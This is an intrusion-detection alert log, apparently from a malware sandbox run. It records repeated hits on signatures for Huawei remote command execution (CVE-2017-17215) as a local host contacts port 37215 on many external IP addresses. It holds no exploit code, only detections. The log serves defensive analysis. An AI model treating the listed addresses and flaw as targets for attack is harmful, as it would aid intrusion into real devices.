                                                        06/13/24-21:32:52.678717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.14197.178.194.240
                                                        06/13/24-21:33:07.060196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042437215192.168.2.14156.33.201.150
                                                        06/13/24-21:32:50.613753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821437215192.168.2.14197.205.16.157
                                                        06/13/24-21:32:01.223443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110637215192.168.2.14156.182.224.211
                                                        06/13/24-21:32:13.543849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975837215192.168.2.14197.202.79.152
                                                        06/13/24-21:32:44.476113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413437215192.168.2.14197.32.1.107
                                                        06/13/24-21:32:17.676180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392037215192.168.2.1441.20.206.152
                                                        06/13/24-21:32:54.724425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222837215192.168.2.14197.170.0.163
                                                        06/13/24-21:32:58.823206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530237215192.168.2.14156.161.219.116
                                                        06/13/24-21:31:57.093478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042037215192.168.2.1441.29.33.191
                                                        06/13/24-21:32:36.268333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011837215192.168.2.14156.237.43.142
                                                        06/13/24-21:32:34.215754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084237215192.168.2.14197.183.15.31
                                                        06/13/24-21:33:09.108238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577637215192.168.2.14197.237.167.31
                                                        06/13/24-21:32:23.934836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697037215192.168.2.1441.67.163.161
                                                        06/13/24-21:32:28.026904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549637215192.168.2.14197.4.113.193
                                                        06/13/24-21:33:11.181544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735837215192.168.2.14197.140.27.17
                                                        06/13/24-21:32:11.487561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816237215192.168.2.1441.201.222.228
                                                        06/13/24-21:32:56.755264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023237215192.168.2.1441.71.39.147
                                                        06/13/24-21:33:11.157979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297037215192.168.2.1441.168.16.231
                                                        06/13/24-21:32:19.731393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654237215192.168.2.1441.60.231.198
                                                        06/13/24-21:32:34.215473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003437215192.168.2.14156.188.156.10
                                                        06/13/24-21:32:54.725837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709437215192.168.2.14197.195.154.96
                                                        06/13/24-21:32:38.300534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817237215192.168.2.14197.213.5.149
                                                        06/13/24-21:32:05.378543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391837215192.168.2.14197.22.127.100
                                                        06/13/24-21:32:38.297111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469837215192.168.2.14156.86.121.105
                                                        06/13/24-21:32:46.523492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764037215192.168.2.14156.54.79.159
                                                        06/13/24-21:32:52.659946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534637215192.168.2.14197.93.16.215
                                                        06/13/24-21:33:13.231044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567237215192.168.2.1441.33.155.197
                                                        06/13/24-21:32:42.417949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429437215192.168.2.1441.159.21.138
                                                        06/13/24-21:33:09.107237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353237215192.168.2.14197.174.186.171
                                                        06/13/24-21:33:09.129476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282237215192.168.2.14197.230.169.58
                                                        06/13/24-21:32:13.545282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463037215192.168.2.1441.222.39.211
                                                        06/13/24-21:32:58.822050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472637215192.168.2.14156.126.162.35
                                                        06/13/24-21:32:50.612988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607237215192.168.2.1441.105.180.38
                                                        06/13/24-21:32:07.401404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011637215192.168.2.14197.113.148.189
                                                        06/13/24-21:32:36.242877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435437215192.168.2.14197.66.16.138
                                                        06/13/24-21:32:01.224765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629437215192.168.2.14156.42.38.198
                                                        06/13/24-21:32:52.671063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273637215192.168.2.1441.28.168.32
                                                        06/13/24-21:32:07.418268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739437215192.168.2.14156.18.118.167
                                                        06/13/24-21:33:09.107755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225037215192.168.2.14197.236.116.106
                                                        06/13/24-21:32:30.075168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.1441.122.170.60
                                                        06/13/24-21:32:36.264796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094637215192.168.2.14156.78.138.251
                                                        06/13/24-21:32:07.416285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014437215192.168.2.14156.238.90.151
                                                        06/13/24-21:31:57.132688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659437215192.168.2.1441.183.27.219
                                                        06/13/24-21:32:54.724372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048037215192.168.2.1441.226.38.63
                                                        06/13/24-21:32:28.027262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137037215192.168.2.14197.126.154.248
                                                        06/13/24-21:32:21.804451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347637215192.168.2.14156.181.88.139
                                                        06/13/24-21:33:05.013175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800237215192.168.2.14156.33.230.138
                                                        06/13/24-21:32:56.758459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098237215192.168.2.14197.62.153.180
                                                        06/13/24-21:32:36.244749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494037215192.168.2.14156.196.59.223
                                                        06/13/24-21:33:00.870849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906037215192.168.2.14156.183.23.91
                                                        06/13/24-21:32:58.843891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192037215192.168.2.14197.210.174.208
                                                        06/13/24-21:32:01.248367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465037215192.168.2.14156.170.23.95
                                                        06/13/24-21:32:48.570326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872637215192.168.2.14197.150.111.205
                                                        06/13/24-21:33:11.159784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.1441.120.132.168
                                                        06/13/24-21:32:28.024315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433637215192.168.2.1441.165.119.166
                                                        06/13/24-21:32:48.567897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.14197.183.193.103
                                                        06/13/24-21:32:25.994539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265837215192.168.2.14156.126.88.162
                                                        06/13/24-21:32:34.191764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200837215192.168.2.14156.247.185.242
                                                        06/13/24-21:33:00.868962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032837215192.168.2.1441.201.213.202
                                                        06/13/24-21:32:32.167932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737237215192.168.2.14197.20.84.241
                                                        06/13/24-21:33:07.041452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966637215192.168.2.14197.94.249.236
                                                        06/13/24-21:32:30.094417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3971037215192.168.2.14156.85.228.19
                                                        06/13/24-21:32:32.166742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621637215192.168.2.14197.25.124.31
                                                        06/13/24-21:33:11.159254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319837215192.168.2.14156.225.247.175
                                                        06/13/24-21:33:09.109919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732837215192.168.2.14156.203.247.164
                                                        06/13/24-21:32:58.824131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898037215192.168.2.1441.55.177.254
                                                        06/13/24-21:33:15.255835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.1441.118.137.48
                                                        06/13/24-21:32:44.454640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452837215192.168.2.1441.144.188.222
                                                        06/13/24-21:32:50.630660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087837215192.168.2.14156.34.93.148
                                                        06/13/24-21:32:52.680005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14197.213.143.251
                                                        06/13/24-21:33:02.914086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.14197.128.203.190
                                                        06/13/24-21:33:13.213284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955037215192.168.2.14197.208.50.111
                                                        06/13/24-21:32:38.317426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726237215192.168.2.1441.222.110.201
                                                        06/13/24-21:32:52.670571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442237215192.168.2.14156.35.132.167
                                                        06/13/24-21:32:58.842646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5641837215192.168.2.1441.95.26.89
                                                        06/13/24-21:32:52.677745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580037215192.168.2.14156.46.227.131
                                                        06/13/24-21:32:23.837279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026437215192.168.2.14197.155.162.97
                                                        06/13/24-21:32:58.822647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073037215192.168.2.14197.169.77.143
                                                        06/13/24-21:32:44.456690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371837215192.168.2.1441.59.147.97
                                                        06/13/24-21:33:00.869044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520237215192.168.2.14197.199.7.161
                                                        06/13/24-21:33:13.211122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865837215192.168.2.1441.59.55.45
                                                        06/13/24-21:32:07.415623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232037215192.168.2.14197.131.82.104
                                                        06/13/24-21:32:28.044672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116237215192.168.2.14156.151.150.202
                                                        06/13/24-21:33:09.130875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905237215192.168.2.1441.187.9.81
                                                        06/13/24-21:32:42.406939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.14197.231.142.25
                                                        06/13/24-21:33:02.938065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605637215192.168.2.14156.31.28.227
                                                        06/13/24-21:33:17.306060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127037215192.168.2.1441.5.135.169
                                                        06/13/24-21:31:57.091397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404037215192.168.2.1441.161.235.104
                                                        06/13/24-21:32:03.279362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404837215192.168.2.1441.222.186.62
                                                        06/13/24-21:32:21.783524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614837215192.168.2.14197.133.230.177
                                                        06/13/24-21:31:57.153061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821437215192.168.2.14156.218.212.198
                                                        06/13/24-21:32:52.655635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615637215192.168.2.1441.76.191.110
                                                        06/13/24-21:32:09.452970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289237215192.168.2.14156.186.4.132
                                                        06/13/24-21:32:01.239875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784837215192.168.2.14156.151.243.30
                                                        06/13/24-21:32:03.278337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261037215192.168.2.1441.228.70.82
                                                        06/13/24-21:33:09.088615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501637215192.168.2.1441.5.185.107
                                                        06/13/24-21:32:23.931113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344237215192.168.2.1441.123.221.178
                                                        06/13/24-21:32:58.822565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298837215192.168.2.1441.223.81.41
                                                        06/13/24-21:32:56.756056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805437215192.168.2.14156.20.152.93
                                                        06/13/24-21:32:36.264161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810037215192.168.2.14156.67.22.150
                                                        06/13/24-21:32:03.299755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521637215192.168.2.14197.224.168.26
                                                        06/13/24-21:32:46.502147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000437215192.168.2.14197.9.70.117
                                                        06/13/24-21:32:11.507315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497037215192.168.2.14156.80.115.40
                                                        06/13/24-21:32:21.803857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941037215192.168.2.14197.70.160.83
                                                        06/13/24-21:32:23.833008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575837215192.168.2.1441.51.120.99
                                                        06/13/24-21:32:32.149376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378037215192.168.2.14156.119.171.198
                                                        06/13/24-21:32:17.672742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716237215192.168.2.14197.204.182.65
                                                        06/13/24-21:32:54.710949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787637215192.168.2.14156.46.126.112
                                                        06/13/24-21:33:13.231265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428837215192.168.2.14197.90.229.23
                                                        06/13/24-21:33:02.914628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822037215192.168.2.14197.203.148.85
                                                        06/13/24-21:33:09.087602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060037215192.168.2.1441.201.96.78
                                                        06/13/24-21:32:03.306958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878037215192.168.2.14156.9.135.180
                                                        06/13/24-21:32:30.079160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690037215192.168.2.14156.237.43.107
                                                        06/13/24-21:32:30.095725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593237215192.168.2.1441.107.85.147
                                                        06/13/24-21:32:42.406441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4475637215192.168.2.14197.25.234.75
                                                        06/13/24-21:32:32.151338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690037215192.168.2.14156.153.60.75
                                                        06/13/24-21:32:32.152831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435437215192.168.2.1441.128.89.176
                                                        06/13/24-21:33:04.992694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773237215192.168.2.14197.186.1.210
                                                        06/13/24-21:32:42.424627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704237215192.168.2.1441.107.157.240
                                                        06/13/24-21:32:46.501909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291037215192.168.2.14156.242.86.39
                                                        06/13/24-21:32:32.169662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324037215192.168.2.1441.206.110.43
                                                        06/13/24-21:32:15.610636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219037215192.168.2.14197.162.215.170
                                                        06/13/24-21:32:54.725511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643037215192.168.2.14156.64.45.206
                                                        06/13/24-21:31:57.135658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749837215192.168.2.1441.8.155.166
                                                        06/13/24-21:32:36.245347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795637215192.168.2.14156.254.6.241
                                                        06/13/24-21:33:09.110728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836437215192.168.2.1441.122.101.132
                                                        06/13/24-21:33:11.159744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310037215192.168.2.14197.57.84.102
                                                        06/13/24-21:31:57.137066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866837215192.168.2.1441.158.26.48
                                                        06/13/24-21:32:21.781483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031237215192.168.2.1441.115.211.190
                                                        06/13/24-21:32:21.787609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.14197.147.231.230
                                                        06/13/24-21:32:34.195053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887637215192.168.2.14156.43.239.21
                                                        06/13/24-21:32:15.610825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372437215192.168.2.14197.249.57.93
                                                        06/13/24-21:32:03.275771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316437215192.168.2.14156.148.90.191
                                                        06/13/24-21:32:28.028431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115037215192.168.2.14197.96.62.76
                                                        06/13/24-21:32:32.154012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692837215192.168.2.14197.147.210.44
                                                        06/13/24-21:32:30.099600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347837215192.168.2.14156.183.92.138
                                                        06/13/24-21:32:40.371910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903637215192.168.2.1441.232.219.34
                                                        06/13/24-21:32:38.301523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656037215192.168.2.1441.130.245.228
                                                        06/13/24-21:32:28.027376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853237215192.168.2.14156.219.83.186
                                                        06/13/24-21:32:28.048251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928037215192.168.2.1441.224.234.25
                                                        06/13/24-21:33:07.060748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907837215192.168.2.14156.146.226.33
                                                        06/13/24-21:32:38.297833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510837215192.168.2.14156.33.33.87
                                                        06/13/24-21:32:23.943579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322237215192.168.2.14156.250.43.35
                                                        06/13/24-21:32:07.402540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416437215192.168.2.14156.69.148.229
                                                        06/13/24-21:32:15.629918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136837215192.168.2.1441.52.135.204
                                                        06/13/24-21:32:44.451987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516237215192.168.2.14156.95.13.49
                                                        06/13/24-21:33:04.988200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048637215192.168.2.1441.240.77.124
                                                        06/13/24-21:32:28.028908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319637215192.168.2.14156.198.78.164
                                                        06/13/24-21:32:40.374502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959237215192.168.2.14156.44.248.15
                                                        06/13/24-21:31:57.129876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507837215192.168.2.14156.31.9.128
                                                        06/13/24-21:32:42.420508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.1441.115.174.207
                                                        06/13/24-21:32:05.346031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025437215192.168.2.1441.46.126.32
                                                        06/13/24-21:32:17.695723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995437215192.168.2.14156.137.160.129
                                                        06/13/24-21:32:23.941525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5202837215192.168.2.14156.5.214.222
                                                        06/13/24-21:33:02.913441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082437215192.168.2.14156.159.225.135
                                                        06/13/24-21:33:09.111031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030237215192.168.2.14156.94.221.134
                                                        06/13/24-21:32:44.477527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413037215192.168.2.1441.13.104.203
                                                        06/13/24-21:32:42.420708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489437215192.168.2.14156.54.97.129
                                                        06/13/24-21:32:32.170484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630637215192.168.2.14197.164.28.127
                                                        06/13/24-21:32:46.503639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481437215192.168.2.14197.229.197.203
                                                        06/13/24-21:31:57.131243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650637215192.168.2.14197.49.125.52
                                                        06/13/24-21:31:57.129847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331837215192.168.2.14156.82.201.224
                                                        06/13/24-21:32:15.608710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638037215192.168.2.14197.168.81.173
                                                        06/13/24-21:31:57.092329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997837215192.168.2.14197.190.253.88
                                                        06/13/24-21:31:57.130359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671037215192.168.2.1441.199.255.244
                                                        06/13/24-21:32:19.749050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988237215192.168.2.14197.211.240.137
                                                        06/13/24-21:32:44.451047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983437215192.168.2.14156.195.179.155
                                                        06/13/24-21:32:01.240861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553837215192.168.2.14156.189.17.67
                                                        06/13/24-21:32:42.403881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350037215192.168.2.14197.1.161.97
                                                        06/13/24-21:33:04.994206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367237215192.168.2.1441.198.139.131
                                                        06/13/24-21:33:15.275169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314637215192.168.2.1441.231.115.159
                                                        06/13/24-21:32:50.630434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662237215192.168.2.1441.215.5.235
                                                        06/13/24-21:32:09.458671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249837215192.168.2.14197.194.244.222
                                                        06/13/24-21:32:38.299047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353437215192.168.2.14156.85.217.39
                                                        06/13/24-21:33:07.041769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262237215192.168.2.14197.9.101.12
                                                        06/13/24-21:31:59.173690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933837215192.168.2.1441.189.211.206
                                                        06/13/24-21:32:21.781726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578637215192.168.2.1441.240.186.174
                                                        06/13/24-21:32:34.214659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885237215192.168.2.14156.128.52.149
                                                        06/13/24-21:32:44.451688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964837215192.168.2.14156.139.98.87
                                                        06/13/24-21:33:04.990801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778237215192.168.2.14197.104.71.177
                                                        06/13/24-21:32:28.028804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744037215192.168.2.1441.112.95.107
                                                        06/13/24-21:33:00.884297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937437215192.168.2.14197.222.133.198
                                                        06/13/24-21:33:17.310393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220837215192.168.2.14197.140.205.165
                                                        06/13/24-21:32:05.376980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497637215192.168.2.1441.251.22.197
